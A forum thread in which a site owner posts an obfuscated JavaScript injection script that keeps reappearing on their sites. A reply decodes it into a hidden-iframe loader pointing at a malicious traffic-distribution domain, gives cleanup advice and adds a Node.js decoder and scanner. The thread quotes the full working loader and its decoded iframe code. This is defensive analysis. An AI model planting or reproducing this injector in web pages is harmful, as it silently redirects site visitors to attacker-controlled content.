
Malware script attacked my sites


Postby sivachandru » Sat Feb 18, 2012 6:57 am

The malware script below attacked my sites. I removed it more than 15 times but it keeps coming back again and again. I have been changing the FTP passwords once every 2 hours but it is no use. Help me to remove this script and stop its routine attack.

"<script>if(window.document)aa=/s/g.exec("s").index+[];aaa='0';if(aa.indexOf(aaa)===0){ss='';s=String;ee='e';e=window.eval;t='y';}h=2*Math.cos(Math.PI);n=[3.5,3.5,51.5,50,15,19,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23,45.5,19.5,60.5,3.5,3.5,3.5,51.5,50,56,47.5,53.5,49.5,56,19,19.5,28.5,3.5,3.5,61.5,15,49.5,53,56.5,49.5,15,60.5,3.5,3.5,3.5,49,54.5,48.5,57.5,53.5,49.5,54,57,22,58.5,56,51.5,57,49.5,19,16,29,51.5,50,56,47.5,53.5,49.5,15,56.5,56,48.5,29.5,18.5,51,57,57,55,28,22.5,22.5,57,49,56.5,24.5,26,22,25,53.5,59.5,49,54.5,53.5,47.5,51.5,54,22,48.5,54.5,53.5,22.5,56.5,57,49,56.5,22.5,50.5,54.5,22,55,51,55,30.5,56.5,51.5,49,29.5,23.5,18.5,15,58.5,51.5,49,57,51,29.5,18.5,23.5,23,18.5,15,51,49.5,51.5,50.5,51,57,29.5,18.5,23.5,23,18.5,15,56.5,57,59.5,53,49.5,29.5,18.5,58,51.5,56.5,51.5,48,51.5,53,51.5,57,59.5,28,51,51.5,49,49,49.5,54,28.5,55,54.5,56.5,51.5,57,51.5,54.5,54,28,47.5,48,56.5,54.5,53,57.5,57,49.5,28.5,53,49.5,50,57,28,23,28.5,57,54.5,55,28,23,28.5,18.5,30,29,22.5,51.5,50,56,47.5,53.5,49.5,30,16,19.5,28.5,3.5,3.5,61.5,3.5,3.5,50,57.5,54,48.5,57,51.5,54.5,54,15,51.5,50,56,47.5,53.5,49.5,56,19,19.5,60.5,3.5,3.5,3.5,58,47.5,56,15,50,15,29.5,15,49,54.5,48.5,57.5,53.5,49.5,54,57,22,48.5,56,49.5,47.5,57,49.5,33.5,53,49.5,53.5,49.5,54,57,19,18.5,51.5,50,56,47.5,53.5,49.5,18.5,19.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,56.5,56,48.5,18.5,21,18.5,51,57,57,55,28,22.5,22.5,57,49,56.5,24.5,26,22,25,53.5,59.5,49,54.5,53.5,47.5,51.5,54,22,48.5,54.5,53.5,22.5,56.5,57,49,56.5,22.5,50.5,54.5,22,55,51,55,30.5,56.5,51.5,49,29.5,23.5,18.5,19.5,28.5,50,22,56.5,57,59.5,53,49.5,22,58,51.5,56.5,51.5,48,51.5,53,51.5,57,59.5,29.5,18.5,51,51.5,49,49,49.5,54,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,55,54.5,56.5,51.5,57,51.5,54.5,54,29.5,18.5,47.5,48,56.5,54.5,53,57.5,57,49.5,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,53,49.5,50,57,29.5,18.5,23,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,57,54.5,55,29.5,18.5,23,18.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,58.5,51.5,49,57,51,18.5,21,18.5,23.5,23,18.5,19.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,51,49.5,51.5,50.5,51,57,18.5,21,18.5,23.5,23,18.5,19.5,28.5,3.5,3.5,3.5,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23,45.5,22,47.5,55,55,49.5,54,49,32.5,51,51.5,53,49,19,50,19.5,28.5,3.5,3.5,61.5];f='f'+'romChar';for(i=0;i-n.length<0;i++){j=i;ss=ss+String[f+'Code'](-h*(1+n[j]));}q=ss;e(q);</script> "

Re: Malware script attacked my sites

Postby TheProdigyGuy » Sun Feb 19, 2012 11:42 am

OK, let me decode it for you:

Code: Select all
//eval
if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://tds36.4mydomain.com/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}
function iframer(){var f = document.createElement('iframe');f.setAttribute('src','http://tds36.4mydomain.com/stds/go.php?sid=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');document.getElementsByTagName('body')[0].appendChild(f);}

//document.write (s)
<iframe src='http://tds36.4mydomain.com/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>

//jsunpack.url var ss = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://tds36.4mydomain.com/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function
//jsunpack.url var q = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://tds36.4mydomain.com/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function
//jsunpack.url var newurl = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://tds36.4mydomain.com/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function


It is TDS!

http://www.symantec.com/connect/blogs/w ... on-systems

http://sucuri.net/malware/malware-entry-mwiframeenc1560


And finally, here is the author of this *pack*:
http://www.simpletds.com/manual-install


Analysing the h***://tds36.4mydomain.com domain, there is no route to host.
So, it seems your computer is infected with TDS which is unable to update itself and still injects the outdated payload tds36.4mydomain.com.



Here are a few things for you:
1) Your computer is infected (rootkit, trojan, virus, spyware, etc.).
This way, when you connect to the FTP server of your site, it injects its "payload" into memory on the fly (finally it injects that obfuscated JavaScript payload into your scripts) and spreads itself + infects your sites.
So make sure your computer is clean, keep your software up to date, check for rootkits (e.g. UnHackMe).
Use antiviruses, firewalls, launch your browser from Sandboxie and so on.


2) It is possible your site is vulnerable (LFI, RFI, SQLi, etc.);
that way script kiddies pwned your site and then infected it (for a botnet).

3) It is possible your hosting company is not administering correctly (and it is vulnerable to different attacks),
e.g. outdated software which has a lot of 0-days.

You need to investigate how it appeared:
1) You need to analyse your site logs (*.tar.gz, *.tar).
It is a complex thing and requires knowledge (especially of Linux).


Anyway, clean your computer and use software from official sites.
Update your web software; change your MySQL, FTP, SSH, cPanel and email passwords and secret questions, and use unique, random passwords.
A) Log in to your cPanel (after cleanup) and investigate whether you have any additional (backdoor) FTP accounts.
B) Look at cron jobs (I see a lot of cron-based backdoors).

After cleaning up your computer,
download a full backup of your site and scan it with antiviruses (IMHO Avira AntiVir is the best way to do it).

Good Luck)
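The decode above came from running the loader through jsunpack, which executes it. The same text can be recovered without executing anything by reproducing the loader's own arithmetic: h = 2*Math.cos(Math.PI) is -2, so every character is String.fromCharCode(2*(1+n[j])). The Node.js script below is an added example for this thread, not code from either poster and not from jsunpack, Sucuri or Symantec. It decodes the slice of the posted n=[...] array that encodes the document.write fallback (those numbers are copied from the first post), pulls the iframe target out of the decoded text, and then scans a page for script blocks of this shape and strips them, which is the check you would run over the downloaded backup before putting files back. The "infected page" it scans is constructed here around that slice; the function and variable names are mine.

```javascript
'use strict';

// Slice of the n=[...] array from the script in the first post: the part that
// encodes the document.write(...) fallback. Copied from the posted payload.
const POSTED_SLICE = [
  49,54.5,48.5,57.5,53.5,49.5,54,57,22,58.5,56,51.5,57,49.5,19,16,29,51.5,50,56,47.5,53.5,49.5,15,
  56.5,56,48.5,29.5,18.5,51,57,57,55,28,22.5,22.5,57,49,56.5,24.5,26,22,25,53.5,59.5,49,54.5,53.5,
  47.5,51.5,54,22,48.5,54.5,53.5,22.5,56.5,57,49,56.5,22.5,50.5,54.5,22,55,51,55,30.5,56.5,51.5,49,
  29.5,23.5,18.5,15,58.5,51.5,49,57,51,29.5,18.5,23.5,23,18.5,15,51,49.5,51.5,50.5,51,57,29.5,18.5,
  23.5,23,18.5,15,56.5,57,59.5,53,49.5,29.5,18.5,58,51.5,56.5,51.5,48,51.5,53,51.5,57,59.5,28,51,
  51.5,49,49,49.5,54,28.5,55,54.5,56.5,51.5,57,51.5,54.5,54,28,47.5,48,56.5,54.5,53,57.5,57,49.5,
  28.5,53,49.5,50,57,28,23,28.5,57,54.5,55,28,23,28.5,18.5,30,29,22.5,51.5,50,56,47.5,53.5,49.5,30,
  16,19.5,28.5,
];

// The loader computes String.fromCharCode(-h*(1+n[j])) with h = 2*Math.cos(Math.PI),
// i.e. -2. Reproduce that arithmetic and return the text instead of feeding it to eval.
function decodeNumericPayload(n, h = 2 * Math.cos(Math.PI)) {
  let out = '';
  for (let j = 0; j < n.length; j++) {
    out += String.fromCharCode(-h * (1 + n[j]));
  }
  return out;
}

// Pull the iframe target out of the decoded text (the thing to block and grep for).
function extractIframeSrc(decoded) {
  const m = /<iframe[^>]*\ssrc=['"]([^'"]+)['"]/i.exec(decoded);
  return m ? m[1] : null;
}

// Find every <script> block with this loader's fingerprint: a window.eval alias,
// a numeric n=[...] array, and the split 'f'+'romChar'+'Code' name. Each hit is
// returned with its offsets, its decoded text and the iframe target.
function findInjectedLoaders(html) {
  const hits = [];
  const scriptRe = /<script[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const body = m[1];
    const arr = /\bn=\[([^\]]*)\]/.exec(body);
    if (!arr || !/window\.eval/.test(body) || !/romChar/.test(body)) continue;
    const n = arr[1].split(',').map(Number);
    if (n.length === 0 || n.some(Number.isNaN)) continue;
    const decoded = decodeNumericPayload(n);
    hits.push({
      start: m.index,
      end: m.index + m[0].length,
      decoded,
      iframeSrc: extractIframeSrc(decoded),
    });
  }
  return hits;
}

// Remove the matched blocks. Work from the last hit backwards so that earlier
// offsets stay valid while the string shrinks.
function stripInjectedLoaders(html) {
  const hits = findInjectedLoaders(html);
  let clean = html;
  for (const hit of hits.slice().reverse()) {
    clean = clean.slice(0, hit.start) + clean.slice(hit.end);
  }
  return { clean, hits };
}

// Constructed sample: a harmless page with the posted loader skeleton wrapped
// around POSTED_SLICE, the way it would look inside an infected index.php.
const INFECTED_PAGE = `<html><body><p>Welcome</p>
<script>if(window.document)aa=/s/g.exec("s").index+[];aaa='0';if(aa.indexOf(aaa)===0){ss='';s=String;ee='e';e=window.eval;t='y';}h=2*Math.cos(Math.PI);n=[${POSTED_SLICE.join(',')}];f='f'+'romChar';for(i=0;i-n.length<0;i++){j=i;ss=ss+String[f+'Code'](-h*(1+n[j]));}q=ss;e(q);</script>
</body></html>`;

if (typeof require !== 'undefined' && require.main === module) {
  const { clean, hits } = stripInjectedLoaders(INFECTED_PAGE);
  for (const hit of hits) {
    console.log('decoded :', hit.decoded);
    console.log('target  :', hit.iframeSrc);
  }
  console.log('cleaned page:\n' + clean);
}
```

Run it with node. The scanner keys on three things the posted loader carries (the window.eval alias, the numeric array, the split fromCharCode name); a reworked variant that renames them would pass it, so treat a clean scan as one piece of evidence and still do the cron-job and FTP-account checks above. Feed real files through fs.readFileSync and write clean back only after you have confirmed the hits by reading the decoded text, because the same function can also remove a block you did not mean to touch.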

